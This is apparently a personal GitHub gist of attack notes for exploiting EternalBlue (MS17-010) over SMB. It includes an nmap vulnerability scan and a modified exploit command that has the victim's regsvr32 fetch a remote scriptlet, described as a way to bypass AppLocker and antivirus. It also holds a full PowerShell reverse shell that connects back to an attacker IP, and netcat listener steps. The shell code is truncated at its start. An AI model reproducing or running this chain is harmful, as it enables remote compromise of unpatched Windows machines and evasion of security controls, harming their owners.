Skip to content

Instantly share code, notes, and snippets.

@dumpmycode

dumpmycode/NotesOnEB.md

Created May 7, 2019 10:40
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save dumpmycode/05f85039728acd1d2cb22b6d024ce9c3 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save dumpmycode/05f85039728acd1d2cb22b6d024ce9c3 to your computer and use it in GitHub Desktop.
Download ZIP
EternalBlue
Raw
NotesOnEB.md

Notes for eternal blue (SMB port 445 attack)

Use nmap to check if a port is vulnerable to eb nmap -n -Pn --script=vuln x.x.x.x -p 445

  • Named pipe is required for manual exploit, enumerate by using pipe_auditor msf module

  • Opting for reverse shell called from regsvr32 to bypass applocker. Calling binaries directly from cmd usually will get flagged by AV, calling binaries from regsvr32 unregistered dll most likely OK as regsvr32 often used by OS (whitelisted).

    1. Remote code execution available through eb exploit (https://github.com/worawit/MS17-010)

      • add valid username
      • enable the execute function and update the command (default only create pwnd.txt in c:) service_exec(conn, r"regsvr32 /s /n /u /i:http://x.x.x.x:8080/desktop.ini scrobj.dll")

    2. Create a 'caller' file for regsvr32 to access from victim machine, host it on attacker machine this caller file is usually in .sct but it can be anything. (config.ini, doc.txt, readme.md, etc)

      <?XML version="1.0"?>
 <scriptlet>
  <registration     
   progid="PoC"
   classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
   <!-- Proof Of Concept - Casey Smith @subTee -->
   <!--  License: BSD3-Clause -->
   <script language="JScript">
     <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]>
   </script>
  </registration>
</scriptlet>

    3. Insert your powershell shellcode in the caller file, replace calc.exe.

         {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='x.x.x.x';$p='1337';
   $c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();
   $nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;
   $p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;
   $p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();
   $is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;
   while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);
   $o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; 
   while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);
   $pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};
   if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;
   if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());
   if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};```

    4. Set up your listener such as netcat, adjust the port as required

    5. Use eb to execute caller file, which this caller file will execute your shellcode.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment